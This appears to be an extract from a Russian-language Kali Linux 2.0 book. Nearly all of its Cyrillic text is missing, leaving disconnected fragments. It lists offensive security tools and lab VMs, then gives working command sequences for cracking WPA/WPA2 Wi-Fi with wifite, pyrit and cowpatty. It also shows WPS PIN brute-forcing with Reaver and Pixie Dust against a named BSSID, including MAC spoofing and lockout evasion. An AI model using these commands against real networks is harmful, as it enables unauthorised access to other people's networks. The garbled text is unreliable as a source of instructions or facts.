Autoscan
.
.

Knocker
Knocker TCP, C, ,
.

NSAT ,
,
Nsat .
(
).

PBNJ
.
OutputPBNJ .
,
.

ScanPBNJ Nmap,
. ScanPBNJ
ScanPBNJ
. ScanPBNJ IP ,
, localhost.

, Glype proxy script


/ . , proxy
glypeahead
script ,
cURL.

Unicornscan ,
Unicornscan
.

WebWare.biz 99
Kali Linux 2.0

- tcp Linux.
TCP Fast Scan . /
+

Multi Threaded
TCP Port Scanner IP.
3.0 ( ).

MingSweeper ,
MingSweeper
.

Umap (UPNP Map) TCP


Umap(UPNP Map)
UPNP Internet Gateway Device(IGD) NAT.

SendIP
NTP, BGP, RIP, RIPng, TCP,
SendIP
UDP, ICMP IPv4 IPv6 .
.

Sentry
Unix. PortSentry, Logcheck/LogSentry HostSentry
PortSentry ,

.

CurrPorts
TCP/IP UDP .
CurrPorts
,
.

NScan ,
Nscan connect() .
.

NetworkActiv Port Scanner


NetworkActiv
,
Scan
LAN WAN.


Blues Port , - -.
Scanner BluesPortScan , , 32-
Windows, , .

WebWare.biz 100
Kali Linux 2.0

ZMap ,

ZMap . ZMap
IPv4 45
, Ethernet.

Subdomain-bruteforcer
subdomain- Python
bruteforcer .
-.

Ircsnapshot , Python,

, ;
ircsnapshot
.
IRC .
SOCKS TOR.

Wireshark
Wireshark , ,
, .

TCP/UDP/
""
Chaosreader (tcpdump) . "" ,
telnet, FTP , HTTP (HTML, GIF, JPEG, ), SMTP ,
.

dsniff
. dsniff, filesnarf, mailsnarf, msgsnarf,
dsniff
urlsnarf, webspy
.

Ettercap -- LAN.
Ettercap ,
.

NetworkMiner
NetworkMiner (Network Forensic Analysis Tool NFAT) Windows. NetworkMiner
/
, , ,

WebWare.biz 101
Kali Linux 2.0

..

RawCap ,
RawCap
Windows, .

, , ,
. SPIKE Proxy
Spike proxy

-.

Tcpdump ,
Tcpdump
.

Tcpreplay BSD
Aaron Turner UNIX ( Win32 Cygwin),
Tcpreplay
libpcap
.

Pirni ()
iPhone. Wi-FI iPhone
Pirni Sniffer
,
promiscious.

Ufasoft Snif ,
. ,
Ufasoft Snif
,
( ).

Dnsenum ,
dnsenum
.

SomarSofts DumpSec
DumpSec
Microsoft Windows NT/XP/200x.

LDAP Browser LDAP Explorer,


LDAP Browser
Win32.

NetBIOS Enumeration Utility (NBTEnum) Windows,


NBTEnum
NetBIOS .

WebWare.biz 102
Kali Linux 2.0

NETBIOS
nbtscan TCP/IP ,
.

DCOM/WMI,
wmi client Samba4. RPC/DCOM
WMI Windows 2000/XP/2003.

Dnsmap, ,
Dnsmap
.

,
Dnsrecon
, SRV.

Dnstracer , (DNS)
DNS
Dnstracer
,
.

fragroute ,
fragroute
, .

hping /
hping
TCP/IP .

Scapy
.
Scapy
, , ,
.

stunnel
Stunnel SSL ( inetd)
.

tcptraceroute TCP .
traceroute(8), UDP, ICMP
tcptraceroute
ECHO TTL TTL
.

WebWare.biz 103
Kali Linux 2.0

tracetcp WIN32,
TCP SYN, ICMP/UDP ,
tracetcp
,
, .

Yersinia ,
Yersinia .
.

Nemesis UNIX
Windows . Nemesis

Nemesis
(Network Intrusion Detection Systems), , IP
. , Nemesis
.

Aircrack 802.11 WEP WPA-PSK,


Aircrack-ng ,
.

Kismet 802.11 layer2,


. Kismet
Kismet ,
(raw monitoring rfmon)
802.11b, 802.11a 802.11g.

NetStumbler ,
802.11 a/b/g WLAN.
NetStumbler
,
.

AirGrab WiFi AirGrab WiFi Radar


Apple Airport WiFi (802.11b/g/n)
Radar
.

PDA
Windows .
AirMobile agent ,

.

AirRadar
AirRadar 2 .
,

WebWare.biz 104
Kali Linux 2.0

iStumbler
Mac OS X,
iStumbler
AirPort, Bluetooth , Bonjour
Mac.

KisMAC , ,
/ Mac OS X.
KisMAC MacStumbler / iStumbler / NetStumbler
,
.

WirelessMon ,
WiFi ()
WirelessMon

- .

Vistumbler , AutoIT
Vista, Windows 7, and Windows 8. WiFiDB ,
Vistumbler PHP Vistumbler VS1.
GPS, kml, ,
.

WaveStumbler ,
WaveStumbler 802.11 Linux. ,
, WEP, ESSID, MAC ..

Xirrus Wi-Fi Inspector


Xirrus Wi-Fi Wi-Fi Windows XP SP2
Inspector , Vista, 7.
Wi-Fi .

AirMagnet VoFi Analyzer


--WLAN . VoFi
Analyzer WLAN
AirMagnet VoFi ,
Analyzer ,
, , QoS RF.

.

WebWare.biz 105
Kali Linux 2.0

Airpwn 802.11 ()
. Airpwn
,
Airpwn
spoofed
. ,
airpwn .

WifiScanner ,
(,
. GPL.
CISCO card prism hostap
WifiScanner
wlan-ng, prism54g, Hermes/Orinoco, Atheros, Centrino,

IDS
MAC.

Bluetooth

Bluetooth Linux Mac OS X. Harald Scan


Haraldscan , MAC
Bluetooth MAC.

FTS4BT Bluetooth.
FTS4BT FTS4BT
, , , .

BlueScanner bash , Bluetooth


BlueScanner .
Bluetooth .

Blooover II , Java (J2ME).


Blooover II J2ME
Blooover II
.
.

BTScanner XP Bluetooth
BTScanner Microsoft Windows XP, bluecove
( JSR-82 Bluetooth API Java).

BlueSpam bluetooth
BlueSpam ( ) OBEX.
. ,

WebWare.biz 106
Kali Linux 2.0

, SD/MMC card,
/PALM/programs/BlueSpam/Send/
( .jpg )
.

Bluetooth
BTCrawler . J2ME,
MIDP 2.0 JSR082 (Java API Bluetooth)

Bluediving Bluetooth.
Bluebug, BlueSnarf, BlueSnarf++, BlueSmack,
Bluetooth, AT
Bluediving RFCOMM carwhisperer, bss,
L2CAP, L2CAP, RFCOMM
greenplaque scanning mode (
hci ).

Bluesnarfer
Bluetooth .
Bluesnarfer
, PDA .
, , .

Arachni ,
- " ".
Arachni
,
, .

Burp Suite
Burp Suite
-.

CAL9000 -
, -
CAL9000 . CAL9000
,
.

CAT
CAT - ,
.

WebWare.biz 107
Kali Linux 2.0

CookieDigger
-.
CookieDigger
, -
.

DIRB . (/ )
DIRB . ,
- .

Fiddler -,
HTTP(S) . Fiddler
Fiddler
HTTP(S) ,
"" .

Gamja XSS( ) SQL-


URL .
Gamja , ? Gamja
[ XSS, , SQL-
].

-
Grendel-Scan .
.

HTTrack
.
HTTrack
, ,
HTML, .

LiLith , Perl -.
- <form>,
LiLith
,
SQL- .

Nikto - (GPL),
Nikto2 -
, 6500 /CGI.

Paros ,
Paros -.
Java.

Powerfuzzer Powerfuzzer
- ( HTTP

WebWare.biz 108
Kali Linux 2.0

),
,
-.

proxyScan.pl

ProxyScan.pl
. HTTP , GET,
CONNECT, HEAD, .

,
-,

Ratproxy
,
,
web 2.0.

,
. ..
ScanEx
, XSS
.

Scrawlr, HP Web Security Research Group MSRC,


, SQL- . Scrawlr -
Scrawlr
-
SQL Injection.

Springenwerk
Springenwerk
(XSS), Python.

sqlmap
,
Sqlmap
SQL-,
.

sqlsus MySQL-
Sqlsus
, Perl.

Windows, ssl
THCSSLCheck
.

w3af -.
w3af -
, -

WebWare.biz 109
Kali Linux 2.0

Wapiti -.
" " (
Wapiti ), .. ,
, ,
.

Webfuzzer ,
Webfuzzer , -.
" ".

WebGoat - J2EE,
WebGoat OWASP,
-.

Websecurify Suite -,
Websecurify
-.

WebSlayer - -
, ,
(, , ..),
WebSlayer
GET POST ,
(/), ..
.

WhatWeb -. ,
-?. WhatWeb -,
WhatWeb (CMS), ,
/ , JavaScript , -
.

Wikto Nikto Windows ,


Fuzzy, ,
Wikto
Google
/ HTTP .

WSDigger ,
McAfee Foundstone -
WSDigger " " ( )
, . WSDigger
, -.

WebWare.biz 110
Kali Linux 2.0

XSSploit
, Python.
XSSploit
XSS
.

Fireforce Firefox, -
Fireforce GET POST . Fireforce
, .

Netsparker -
.
Netsparker ,

.

Havij SQL-,
Havij SQL-
-.

Oracle Berkeley DB ,
,
Berkeley DB
, ,
.

Database browser .
,
Database browser
, sql ,
.

db2utils db2.
Db2utils : db2disco, db2fakesrv
db2getprofile.

Oracle Auditing Tools ,


Oracle Auditing

Tools
Oracle.

Oscanner Oscanner Oracle,

WebWare.biz 111
Kali Linux 2.0

Java.
.

SQLAT ,
MS SQL .
SQL Auditing Tools , .
, ,
SAM.

THC
, Oracle. THC
THC-ORACLE

Oracle .

OrakelCrackert Oracle
thc- 11g, Oracle.
orakelcrackert11g Oracle 11g
SHA1.

DBPwAudit Java ,

DBPwAudit .

JDBC jdbc.

Python
MYSQLAudit
MySQL.

sqlininja -,
Microsoft SQL Server .

sqlininja
. sqlninja SQL-,
,
.

GreenSQL
, SQL-.
GreenSql
GreenSQL
MySQL PostgreSQL.

WebWare.biz 112
Kali Linux 2.0

The Metasploit Framework


Metasploit
,
Framework
.

OpenVAS ,
OpenVAS
.

Nessus ,
Nessus
.

Porkbind ,

Porkbind
(, sub.host.dom,
host.dom).

Immunity CANVAS Immunity ,


,
Canvas

.

Social-Engineer Toolkit (SET)


Social-
" ". SET
EngineerToolkit
http://www.social-engineer.org
(SET)
.

Acunetix web vulnerability scanner


-,
, , ,
Acunetix
.
, SQL-,
.

RIPS , PHP,
RIPS
PHP .

Rapid7 NeXpose ,
,
Rapid7 NeXpose , , ,
, , .
Rapid7 Metasploit .

WebWare.biz 113
Kali Linux 2.0

VulnDetector -

VulnDetector -. VulnDetector
(XSS) SQL- (SQLI)
-, .

DSSS blind/error SQLi ,


,
(, HTTP,
Damn Small SQLi

Scanner
).
, ,
.

CAT.NET ,

CAT.NET , ,
(XSS), SQL- XPath
.

Peach SmartFuzzer,
, . Peach
Peach Fuzzer
PeachPit, ,
.

GFI LanGuard ,
,
GFI LanGuard .
IP .
5 IP .

Microsoft Baseline Security Analyzer (MBSA)


, IT
,
MBSA

Microsoft
.

Damn Vulnerable Damn Vulnerable Web App (DVWA) -

WebWare.biz 114
Kali Linux 2.0

Web Application PHP/MySQL, .


(DVWA)
, -
-
/ /
- .

Damn Vulnerable Linux (DVL) Linux ,


? ,
Damn Vulnerable , ,
Linux , .
DVL
.

Metasploitable
Linux. VM
Metasploitable
,
.

Kioptrix VM .
,
Kioptrix VM ).

.

HoneyDrive (OVA)
Xubuntu Desktop 12.04 32- .

HoneyDrive
"" honeypot. Kippo SSH honeypot, Dionaea malware
honeypot, Honeyd low-interaction honeypot, Glastopf web honeypot
Wordpot, Thug honeyclient .

Badstore.net , ,
Badstore -
.

InsecureWebApp -,
.
OWASP Insecure
,
Web App Project
,
.

VulnApp VulnApp ASP.net BSD,

WebWare.biz 115
Kali Linux 2.0

,

.

Vicnum OWASP, -
, ,
OWASP Vicnum .
-, ,
sql .

OWASP Broken The Broken Web Applications (BWA) Project


Web Applications
Project .

LAMPSecurity
LAMPSecurity ,
Linux, Apache, PHP, MySQL.


.
Virtual Hacking Lab / /
. live
iso .

The Web Application Vulnerability Scanner Evaluation Project


-,
, -
WAVSEP
.
-,
-.

Moth VMware -
,
Moth -,
(SCA),
-.

Stanford SecuriBench

SecuriBench
.
.91a - Java.

NETinVM NETinVM VMware

WebWare.biz 116
Kali Linux 2.0

VirtualBox,
User-mode Linux (UML) (Linux
), , ,

VMware VirtualBox.

Web Security Dojo


-.
VirtualBox VMware. Dojo
Dojo
, ,
,
.

Live CD

BackTrack Linux
,
BackTrack
, , .
Kali Linux.

Kali Linux ( BackTrack) Debian



.
Kali Linux
, ARM,

.

BackBox Linux, Ubuntu.


.
,
, ;
BackBox
,


.

The Samurai Web Testing Framework live linux,



Samurai . CD
, -
.

WebWare.biz 117
Kali Linux 2.0

Katana ,

.
, ,
Katana , , ,
. Katana
100 Windows;
Wireshark, Metasploit, NMAP, Cain & Abel
.

, Ubuntu
blackbuntu 10.10,
.

Bugtraq , 2.6.38,
. Bugtraq
Live DVD USB ,
Bugtraq , ,
,
,
.

ISO live CD/DVD (NST Live) Fedora.


Network
Security
Toolkit (NST) x86/x86_64
.

Pentoo LiveCD
Gentoo.
Pentoo
,
.

BlackArch Arch. 600


BlackArch. The BlackArch live ISO
BlackArch , dwm, Awesome, Fluxbox,
Openbox, wmii, i3 Spectrwm. BlackArch
Arch.

WebWare.biz 118
Kali Linux 2.0

17. Offensive Security


( Kali Linux)
Git searchsploit:

(The Exploit Database)


,
.
,
,
.
.
, , ,
. ,
.
,
.
(Exploit Database Binary Exploits).
,
. Kali Linux .
, , ,
31583.txt. 31583
. 31583.docx ,
. ,
, , , , ,
. , , Kali
,
.
Exploit Database Binary Exploits -
, .
.
searchsploit,
.
, 3 :
Git
searchsploit Kali Linux
- https://www.exploit-db.com/
searchsploit Kali Linux Git , :

, Git (-u, -t, -
w, colour, id)

WebWare.biz 119
Kali Linux 2.0

- www.exploit-db.com -
. - , .
- , .

searchsploit
Kali ,
searchsploit.
, searchsploit ( Kali,
), Metasploit Exploitation Framework searchsploit
. ,
.
, searchsploit ( ) Linux Mint
( Ubuntu Debian).

opt:
1| mkdir opt

:
1| cd opt

git, :
1| sudo apt-get install git

:
1| git clone https://github.com/offensive-security/exploit-database.git


searchsploit :
1| ~/opt/exploit-database/searchsploit

:
1| ~/opt/exploit-database/searchsploit wordpress sql

WebWare.biz 120
Kali Linux 2.0

.. wordpress sql:

,
searchsploit, Kali (, Kali
exploitdb):
1| mial@mint ~/opt $ find /home/mial/opt/exploit-database/platforms/ -type f | wc -l
33888
2| root@WebWare-Kali:~# find /usr/share/exploitdb/platforms/ -type f | wc -l
98309
3| root@WebWare-Kali:~# find /usr/share/exploitdb/platforms/ -type f | wc -l
33824

WebWare.biz 121
Kali Linux 2.0

2
:

65 ! , -
- .
:
1| ~/opt/exploit-database/searchsploit -u

3.
18. Kali Linux USB Wi-Fi
(2015)
wirelesshack.org, SVNSVNSVN
Kali Linux
USB Wi-Fi ( ).
(),
,
.
, Kali,
.
Kali ,
,
. :
Atheros AR9271
Ralink RT3070

WebWare.biz 122
Kali Linux 2.0

Ralink RT3572
Realtek 8187L ( G )
- Wi-Fi,
, ,
Kali.
, .
.
, ,
, .
,
Wi-Fi G ( ).
N, G
N G.
N.
, . USB
, ,
5 dbi 9 dbi.
USB Wi-Fi Kali.
Alfa 2015 .
Kali Linux USB Wi-Fi .

, Ralink RT3070

Alfa AWUS036NH 2.4 GHz

WebWare.biz 123
Kali Linux 2.0

Alfa AWUS036NEH 2.4 GHz

Panda PAU05 2.4 GHz

WebWare.biz 124
Kali Linux 2.0

, AR9271

Alfa AWUS036NHA

TP-LINK TL-WN722N 2.4 GHz

WebWare.biz 125
Kali Linux 2.0

, RT3572
Alfa AWUS051NH 2.4 GHz 5.8 GHz
,
. 2.4 GHz 5.8
GHz.

USB G,
Realtek 8187L
USB ,
G .
2-5 .
,
N.

WebWare.biz 126
Kali Linux 2.0

Alfa AWUS036H USB 2.4 GHz

Netgear WG111v2 USB 2.4 GHz

WebWare.biz 127
Kali Linux 2.0

Sabrent NT-WGHU USB 2.4 GHz

, Kali
(48 dBi)
Ralink 3070, Kali.
Windows, Windows 7 Mac.
, , ,
N.
High Power SignalKing Signal King 48DBI

WebWare.biz 128
Kali Linux 2.0

4G Kali Linux

NooElec NESDR Mini 2 USB RTL-SDR ADS-B Receiver Set, RTL2832U &
R820T2 Tuner, MCX Input.
RTL-SDR 4G Kali Linux.
, LTE GSM,
, .
, 25 (
). , , .

19. Wi-Fi (WPA/WPA2), pyrit


cowpatty Kali Linux
: .
, , , ,
.
,
.
,
Wi-Fi.
- ,
Kali Linux USB Wi-Fi .
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda
calpp Kali Linux
Wifi WPA/WPA2 ,
. .

WebWare.biz 129
Kali Linux 2.0

,
. ,
Wifi WPA/WPA2,
pyrit cowpatty Kali Linux, ,
cuda calpp (cal++), WiFite
. Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA
WPA2, HashCat cudaHashcat oclHashcat
Wifi WPA WPA2 . Hashcat ,
, ,
. ,
,
. Hashcat
Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 , 12
. 4 , 3 .
,
, ,
. .
: ,
. , Kali
Linux, , . .
802.11 Kali Linux ( USB).
, ,
-, .

WebWare.biz 130
Kali Linux 2.0

handshake WiFite
WiFite, Aircrack-ng, ?
.
:
1| airmon-ng start wlan0
Kali Linux:
1| wifite -wpa
:
1| wifite wpa2
(wep, wpa or wpa2),
, :
1| wifite
, (
). CLIENTS. ,
clients, .
.
all , , .
1,2 ENTER.
, clients,
, . . . ,
. , , ,
, - .
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, WIfite, . . :
1| What do you want to do?
2| [c]ontinue attacking targets
3| [e]xit completely.
c, , e . ,
. c .
1 2. , . .
. ,
, ,
, .
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.

WebWare.biz 131
Kali Linux 2.0

, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
, . . 20% ( )
.
.

.cap Wi-Fi
, .
Kali Linux ,
. . Kali Linux.
root:
1| cp /usr/share/wordlists/rockyou.txt.gz .
:
1| gunzip rockyou.txt.gz
, , WPA2 8
, , ,
8 63 ( ,
, ). ,
newrockyou.txt:
1| cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
1| wc -l newrockyou.txt
9606665 .
:
1| wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst:
1| mv newrockyou.txt wpa.lst

WebWare.biz 132
Kali Linux 2.0

ESSID Pyrit
ESSID Pyrit:
1| pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
1| pyrit -e 'NetComm Wireless' create_essid
,
, ESSID, Pyrit.
Pyrit
, ESSID Pyrit,
.

wpa.lst Pyrit:
1| pyrit -i /root/wpa.lst import_passwords

Pyrit, (batch)
, :
1| pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
.
, .

.
1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. :
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, .
159159186.00 PMK's 1 . ,
, .

WebWare.biz 133
Kali Linux 2.0

: NVIDIA
CUDA Cpyrit-CUDA. ,
. , .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424
captured bytes, only got 259".
(handshake) ,
Pyrit
crunch,
( ), :
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, .
Pyrit cowpatty airolib-ng.
, cowpatty , .
cowpatty. ,
, cowpatty:
1| pyrit -e BigPond -o cow.out export_cowpatty

: WPA WPA2 PSK cowpatty


, cowpatty,
WPA2/PSK. :
1| cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
,
.
, .
, . 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.

WebWare.biz 134
Kali Linux 2.0

cow.out Pyrit:
1| pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid :
1| pyrit -e BigPond delete_essid

, Wifi WPA/WPA2
Reaver-WPS. ,
.

20. Wifi WPA/WPA2


Reaver
- ,
19. Kali Linux USB Wi-Fi
Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
.. Reaver 2012 ,
. https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. ,
, Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit
cowpatty Kali Linux. (

WebWare.biz 135
Kali Linux 2.0

Wifite) .
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, .
, , ,
. Hashcat
, Wifi WPA/WPA2,
MD5, phpBB, MySQL, SHA1 .

Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: .
- .
: , .
10^8 (100,000,000) .
, , . . ,
,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3
(1,000), . . .
Reaver , .
, , 11,000. , Reaver

.
, ,
10 .

Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).

WebWare.biz 136
Kali Linux 2.0

Reaver
:
1| airmon-ng

, . wlan0.
airmon-ng start <_>
:
1| airmon-ng start wlan0

Reaver : BSSID
. , , BSSID :
1| airodump-ng --wps wlan0mon

, Kitty, BSSID 4C:72:B9:FE:B8:0C.


Reaver' .
airodump-ng :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C

WebWare.biz 137
Kali Linux 2.0

SSID ( , SSID )
Reaver', :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -c 4 -e Kitty
, , Reaver
. , ,
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fixed
5 . ,
( 1 ):
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -t 2
1 .
.
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
WPS , 5 ,
. ,
, Reaver 315 (5
15 ) -, WPS
.
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --lock-delay=250
, .
,
:
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv
M5 M7 WPS 0.1 .
, (
1 ):
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS ,
, , NACK, .
, M5/M7, NACK
. , , NACK'
( ),
. , Reaver
, NACK' :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate

WebWare.biz 138
Kali Linux 2.0

10 WPS,
. ,
,
,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360


, Reaver 1 .
-d 0 ,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0

, , dh-small.
Reaver -,
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small

Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x
Pixie Dust Kali Linux.
. .. , Reaver.
Pixiewps
. -K 1. , Reaver
Pixiewps. ..
:

1| reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1

Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-
log reaver; -P // pixiedust-loop reaver

WebWare.biz 139
Kali Linux 2.0

MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
1| # ifconfig wlan0 down
2| # ifconfig wlan0 hw ether 04:DE:AD:BE:EF:45
3| # ifconfig wlan0 up
4| # airmon-ng start wlan0
5| # reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv --mac=04:DE:AD:BE:EF:45

21. Reaver t6x


Pixie Dust
When poor design meets poor implementation.
.
( Reaver, WPS)
: Kali Linux .
" ". .
- ,
19. Kali Linux USB Wi-Fi
Reaver
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS.
, Reaver WPA/WPA2
() 4-10 , . ,
WPS .
- https://code.google.com/p/reaver-wps/.
Pro .
Reaver
.. Reaver 2012 ,
. https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
WebWare.biz 140
Kali Linux 2.0

, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , ,
.
Pixiewps Kali Linux
.
:
1| apt-get libpcap-dev pixiewps

Pixiewps Debian, Mint, Ubuntu


Pixiewps:
1| sudo apt-get install libssl-dev
.
zip- Download ZIP.
1| cd Downloads
2| unzip pixiewps-master.zip
3| cd pixiewps-master/src
4| make
5| gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
6| make install
:
1| install -D pixiewps /usr/local/bin/pixiewps
2| install -m 755 pixiewps /usr/local/bin

Reaver t6x Kali Linux


, Kali Linux ,
" ". .

Reaver t6x Debian, Mint, Ubuntu


Reaver:
1| apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.

WebWare.biz 141
Kali Linux 2.0

Reaver
:
1| git clone https://github.com/t6x/reaver-wps-fork-t6x
:
1| wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip
:
1| cd reaver-wps-fork-t6x*/
2| cd src/
3| ./configure
4| make
:
1| sudo make install

Reaver
Reaver ,
.
Reaver , .
, , :
1| reaver -v
2| Reaver v1.4 WiFi Protected Setup Attack Tool
3| Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, :
:
1| -i, --interface=<wlan>
2| -b, --bssid=<mac> BSSID
:
1| -m, --mac=<mac> MAC
2| -e, --essid=<ssid> ESSID
3| -c, --channel=<channel> 802.11
( -f)
4| -o, --out-file=<file> - [stdout]
5| -s, --session=<file>
6| -C, --exec=<command>

7| -D, --daemonize reaver
8| -a, --auto

WebWare.biz 142
Kali Linux 2.0

9| -f, --fixed
10| -5, --5ghz 5GHz 802.11
11| -v, --verbose (-vv
)
12| -q, --quiet
13| -K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2,
E-Nonce Authkey (Ralink, Broadcom, Realtek)
14| -Z, --no-auto-pass reaver
WPA, pixiewps

15| -h, --help
:
1| -p, --pin=<wps pin> 4 8 WPS
2| -d, --delay=<> [1]
3| -l, --lock-delay=<seconds> ,
[60]
4| -g, --max-attempts=<>
5| -x, --fail-wait=<> 10
[0]
6| -r, --recurring-delay=<x:y> y x
7| -t, --timeout=<> [5]
8| -T, --m57-timeout=<> M5/M7 [0.20]
9| -A, --no-associate (
)
10| -N, --no-nacks NACK

11| -S, --dh-small DH

12| -L, --ignore-locks ,

13| -E, --eap-terminate WPS EAP FAIL
14| -n, --nack NACK [Auto]
15| -w, --win7 Windows 7 registrar [False]
16| -X, --exhaustive
[False]
17| -1, --p1-index
[False]
18| -2, --p2-index
[False]
19| -P, --pixiedust-loop PixieLoop ( M4
M3) [False]

WebWare.biz 143
Kali Linux 2.0

20| -W, --generate-pin devttys0


[1] Belkin [2] D-Link
21| -H, --pixiedust-log
PixieHashes
:
1| reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
-K // pixie-dust reaver
-K 1 pixiewps PKE, PKR, E-Hash1, E-Hash2, E-Nonce Authkey. pixiewps
Ralink, Broadcom Realtek.
* : Realtek, DH (-S)
-H // pixiedust-log reaver
-H PixieHashes,
. -vvv, ,
, -K 1 & -P.
bssid (MAC) .pixie.
PixieDust,
pixiewps.
.
( chmod +x <_>).
-P // pixiedust-loop reaver
(-P) reaver reaver ,
M4 WPS, , ,
. PixieHash,
pixiewps, .
:
/
, ..
,
.
,
PixieHash,
.
Wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
:
1| -i, --interface=<iface>
2| -f, --file [FILE1 FILE2 FILE3 ...]

WebWare.biz 144
Kali Linux 2.0

:
1| -c, --channel=<num> [auto]
2| -o, --out-file=<file>
3| -n, --probes=<num>
[15]
4| -D, --daemonize wash
5| -C, --ignore-fcs
6| -5, --5ghz 5GHz 802.11
7| -s, --scan
8| -u, --survey [default]
9| -P, --file-output-piped Wash
. . wash x|y|z...
10| -g, --get-chipset reaver

11| -h, --help
:
1| wash -i mon0
-g // get-chipset
-g wash reaver
.
, ,
. . reaver
(30 ).

22. WPA2/WPA Hashcat Kali


Linux ( Wi-Fi )
- ,
19. Kali Linux USB Wi-Fi
.
Wi-Fi .
. - ,
. 20
().
, ,
, - (
Hashcat). .
. : 1) ; 2) (
,
). ,
. ))

WebWare.biz 145
Kali Linux 2.0

, - ,
maskprocessor.
Hashcat (cudaHashcat oclHashcat) Kali Linux
() WPA2 WPA. Hashcat .cap .
.cap .hccap.
.
Hashcat
Hashcat, ,
, .
, .
Linux, OSX Windows,
. Hashcat
,
Microsoft LM Hashes, MD4, MD5, SHA, Unix Crypt, MySQL,
Cisco PIX ( ).
Hashcat , . .
, ,
hashcat (,
1Password).
Hashcat
Hashcat
. :
- ()









,
Hashcat .
Hashcat
Hashcat :
Hashcat

oclHashcat

WebWare.biz 146
Kali Linux 2.0

, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt
. - ,
( ), oclHashcat
Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows
- OpenCL OSX.


Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-
) cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
